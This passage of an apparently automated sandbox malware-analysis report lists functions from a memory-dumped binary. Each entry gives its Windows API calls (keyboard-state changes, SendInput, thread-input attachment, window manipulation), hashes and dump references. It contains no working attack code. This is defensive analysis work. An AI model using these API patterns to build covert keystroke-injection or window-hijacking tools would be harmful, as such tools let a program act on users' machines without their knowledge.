                                                                                                                                                                                                                                                                                        • Instruction ID: f7d305e472c350942ad6b91efd80ff44c2c11c8fc7aad9cf55901970222065af
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 801095a98336163450dd73b103c595f3e76c33ef251c483517d212338e2b15fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3413135600A10DFCF11DF55C945A5DBBE2EF89760B19C489E84A9B3A2CB34FD02EB91
                                                                                                                                                                                                                                                                                        Function 00F6B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F6B473
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 00F6B48F
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F6B4FD
                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F6B54F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 62852445a654b4f079de506adb5bef7f67d195b84f9e31fa4ebe74f12e3f2883
                                                                                                                                                                                                                                                                                        • Instruction ID: 834f5873e6fa74041947385c4bc5fe9fbb7ac4ab75b471cdd83bc18e159754ef
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62852445a654b4f079de506adb5bef7f67d195b84f9e31fa4ebe74f12e3f2883
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA312671E402086EFF30CF258C057FA7BB5AB89320F18421AE596D61D6CB788DC6A761
                                                                                                                                                                                                                                                                                        Function 00F6B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00F6B5B8
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F6B5D4
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F6B63B
                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00F6B68D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1a1103a1330171aa5b2da31d6d83ce8df0fe188ec6a5c2e01a7285dcc662314a
                                                                                                                                                                                                                                                                                        • Instruction ID: 43959bf6fde41f88f80699ea90343b796599dbdd6f1a7e2d819ced89c0f19f4e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a1103a1330171aa5b2da31d6d83ce8df0fe188ec6a5c2e01a7285dcc662314a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1131FB31D4060C6EFF308B65CC057FA7BA6EF85320F14826AE485D61D1C7768AD5BB51
                                                                                                                                                                                                                                                                                        Function 00F980AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00F980D4
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F9814A
                                                                                                                                                                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 00F9815A
                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00F981C6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 10e5b5fa97076a1c0a34905179fb85983e6268c4828837491fdc3bc57c78bd38
                                                                                                                                                                                                                                                                                        • Instruction ID: 58ff847ea088ed610c5dc41ca20df08ca5a5908f3236bb094f2daf606a58a1f2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10e5b5fa97076a1c0a34905179fb85983e6268c4828837491fdc3bc57c78bd38
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE41A431A01219DFEF15CF58D884A6977F5FF46364F2440A5EA54DB261CB31E883EB90
                                                                                                                                                                                                                                                                                        Function 00F92176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00F92187
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F643AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetCurrentThreadId.KERNEL32 ref: 00F643B4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F62F00), ref: 00F643BB
                                                                                                                                                                                                                                                                                        • GetCaretPos.USER32(?), ref: 00F9219B
                                                                                                                                                                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00F921E8
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00F921EE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a566175fd884c91908af61187fab7420accd57a7c26e52bba5568a4a61a12f45
                                                                                                                                                                                                                                                                                        • Instruction ID: b4fe7fb5e5be832ff515c5e73981779ae549641cc0d6d492e76e050f3a49d5d8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a566175fd884c91908af61187fab7420accd57a7c26e52bba5568a4a61a12f45
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C316671E00209AFDB04EFA9CC81CAEB7FCEF48304B54846AE415E7251D7759E45EBA0
                                                                                                                                                                                                                                                                                        Function 00F6E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6E8E2
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6E8F9
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6E924
                                                                                                                                                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00F6E92F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5c5d96a29dc925784ff22e4f32712d819c97d9242125a84d7aef5312567e36fa
                                                                                                                                                                                                                                                                                        • Instruction ID: 5dc9bb3745393ad126b9d760becbb15887569ce0d221e4076116e9b68225ea43
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c5d96a29dc925784ff22e4f32712d819c97d9242125a84d7aef5312567e36fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1421C976D00224EFDB10AFA8DD81BAEB7F8EF55360F144065F904BB281D6749E41EBA1
                                                                                                                                                                                                                                                                                        Function 00F99A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F99A5D
                                                                                                                                                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F99A72
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F99ABA
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00F99AF0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f0666cd2dd52f8a3c9f5c55e471dbb503d0f1baba315b788bd63658ef9525c59
                                                                                                                                                                                                                                                                                        • Instruction ID: 90df11467ed12b424f7cd38044f271525bfe34e8feaa7ec3aea34334b326e907
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0666cd2dd52f8a3c9f5c55e471dbb503d0f1baba315b788bd63658ef9525c59
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D521D335900018EFDF158F58C858EFA7BB5EB09360F55405AF905471A1D3799950FB60
                                                                                                                                                                                                                                                                                        Function 00F6DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00F9DC30), ref: 00F6DBA6
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F6DBB5
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6DBC4
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F9DC30), ref: 00F6DC21
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8fef634db07dd5c68aba0211fd5a61a5f6d946c10796f86ca8fc5e58f0c4d587
                                                                                                                                                                                                                                                                                        • Instruction ID: 7f909b35c46955998db88d10bf5960f0fbb526fde22d2f26e7a3619d6c62c321
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fef634db07dd5c68aba0211fd5a61a5f6d946c10796f86ca8fc5e58f0c4d587
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2121A331A043099FC704DF28C98096BB7E8EE96764F200A19F499C32E1DB70D946FB52
                                                                                                                                                                                                                                                                                        Function 00F9321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F932A6
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F932C0
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F932CE
                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F932DC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cce6e810a113b524bc2562f03c5e352cdcaca4a6c3ff4b12dd6cc13bbd68cf28
                                                                                                                                                                                                                                                                                        • Instruction ID: 1c8c66f4217310ff28d59e62e9f5634e3a968213c9a1088a07f75ea59e48a7c4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cce6e810a113b524bc2562f03c5e352cdcaca4a6c3ff4b12dd6cc13bbd68cf28
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8321D331605111AFEB149B24CC45F6ABBA5EF85324F24825DF8268B2D2C776ED41DBD0
                                                                                                                                                                                                                                                                                        Function 00F6825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F696E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F68271,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?), ref: 00F696F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F696E4: lstrcpyW.KERNEL32(00000000,?,?,00F68271,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F69719
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F696E4: lstrcmpiW.KERNEL32(00000000,?,00F68271,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?), ref: 00F6974A
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F6828A
                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F682B0
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F690BB,00000000,?,0000001C,?,?,00000000), ref: 00F682EB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                        • String ID: cdecl
                                                                                                                                                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                        • Opcode ID: c1c0b8d49e6f2bc8e14cdcb171bf0c832eecec34daf445eb9cb95768ecd3b180
                                                                                                                                                                                                                                                                                        • Instruction ID: dc9f061d9814d362291ccc63b453fdefb60c026d171234bb39abda6f90f9474f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1c0b8d49e6f2bc8e14cdcb171bf0c832eecec34daf445eb9cb95768ecd3b180
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E211263A200342ABCB149F38DC45E7A77A9FF487A0B10412EF942C7260EF759812E791
                                                                                                                                                                                                                                                                                        Function 00F960FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00F9615A
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9616C
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F96177
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F962B5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a88d3401cda1630aac809df1de00757865274a5a03f4281a2641b9b3e49b547c
                                                                                                                                                                                                                                                                                        • Instruction ID: 4c2552f6fb9d8907103924ec4470b5b0125f3738b5778c19cac25cacfcf31900
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a88d3401cda1630aac809df1de00757865274a5a03f4281a2641b9b3e49b547c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D11D636A00218A6EF11DFA59C84EEF777CEB157A4F104127F911D5181E7B4C984FB61
                                                                                                                                                                                                                                                                                        Function 00F32079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 2163f8f3bbc333649aeb39fe8fb7c7a5a0231767ea45ebc4e4ab07bfc5dfb3f1
                                                                                                                                                                                                                                                                                        • Instruction ID: 5a7eded35f8e8ffe964f88ffbddaf68414114c1ba17313b06940caad36f338bc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2163f8f3bbc333649aeb39fe8fb7c7a5a0231767ea45ebc4e4ab07bfc5dfb3f1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B701ADF360961A7EF6A52678BCC0F27770EDF413B8F340326B521A12D1DA648C84B160
                                                                                                                                                                                                                                                                                        Function 00F62374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F62394
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F623A6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F623BC
